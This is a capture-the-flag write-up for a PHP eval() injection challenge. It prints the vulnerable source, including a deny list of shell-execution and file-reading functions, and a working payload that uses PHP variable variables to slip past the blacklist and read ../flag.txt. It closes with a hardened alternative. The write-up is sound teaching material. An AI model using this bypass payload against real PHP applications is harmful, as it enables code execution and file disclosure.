# Impasse

This is a PHP `eval()` injection challenge.

When submitting the form, the input is wrapped in an `echo` statement and passed as the `print` GET parameter:

```http
?print=echo+'<YOUR DATA>'+;
```

The first thing we tried was to modify the GET parameter to test for arbitrary code execution:

```
print=echo+'';phpinfo()
```

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-f65f398f8be3c0d63a5c24979c3679867c79504f%2Fimage.png?alt=media)

By checking the `debug` option, we are presented with the page's source code. The following code implements the input blacklist and the `eval()` vulnerability:

```php
<?php
error_reporting(0);
if (isset($_GET['print'])) {
  if (!empty($_GET['print'])){
    $printValue= strtolower($_GET['print']);
    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
      if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }
  eval($printValue . ";");
  } 
}
?>
```

Many useful functions have been blocked! But note that `eval()` is called *after* the `$blocked`, `$special_block` and `$$special_block` variables are defined, and it runs in the same scope, so the `eval`-ed code can reference these variables.

Note that `$$` has a special meaning in PHP: <https://stackoverflow.com/questions/4169882/what-is-in-php>

```php
$foo = 'hello';
$hello = 'The Output';
echo $$foo; // displays "The Output"
```

What happens here is that the value of `$foo` is used as a variable name, so `$$foo` becomes `$hello` (think of it as substituting the value of `$foo` into `$$foo`).

```php
$special_block= "nc";
$$special_block= "../flag.txt";
```

Here, the value of `$special_block` is used as a variable name. The second line defines a new variable, `$nc`, which has the value of `"../flag.txt"`.

Our final payload is

```
?print=echo+'';print(eval('return ${blocked}[4](${nc});'))
```

which leads to the following code being `eval`-ed:

```php
print(eval('return file_get_contents("../flag.txt");'));
```

Note that `$[a-zA-Z]` is blocked by the regex, so we must use the `${...}` syntax instead (which is equivalent). Also, the inner `eval()` executes `file_get_contents("../flag.txt")` but does not display anything by itself; by `return`-ing its result and passing it to `print`, we retrieve the flag.
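As an added illustration (not the challenge's code), the pattern behind this challenge reduced to its essence, beside the form a defender would write instead. The function names and the blacklist subset are assumptions for the example; the point is that once request data is compiled into code, every variable in scope is reachable and no token blacklist can enumerate all the ways to name them.

```php
<?php
// Vulnerable pattern (hypothetical reduction of the challenge): the request
// supplies PHP source text, a blacklist tries to enumerate forbidden tokens,
// and whatever survives is executed with eval(). Variables defined before the
// call ($blocked, $nc) live in the same scope as the eval()-ed string, so the
// payload can name them instead of spelling out the blocked words.
function vulnerable_print(string $userInput): void {
    $blocked = array("cat", "more", "readfile", "fopen", "file_get_contents");
    $special_block = "nc";
    $$special_block = "../flag.txt";   // defines $nc, just like the challenge
    $printValue = strtolower($userInput);
    foreach ($blocked as $word) {
        // strpos() can return 0 for a match at offset 0, so compare to false
        // explicitly; the challenge's bare strpos() check misses that case.
        if (strpos($printValue, $word) !== false) {
            return;
        }
    }
    eval($printValue . ";");   // request data has become code
}

// Hardened form: the parameter is only ever treated as data. There is no
// code for it to be injected into, so the blacklist is not needed; output
// encoding handles the HTML context the value is rendered into.
function safe_print(string $userInput): string {
    return htmlspecialchars($userInput, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample request value for demonstration only.
echo safe_print("<b>hello</b>"), "\n";   // rendered as literal text, not markup
```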

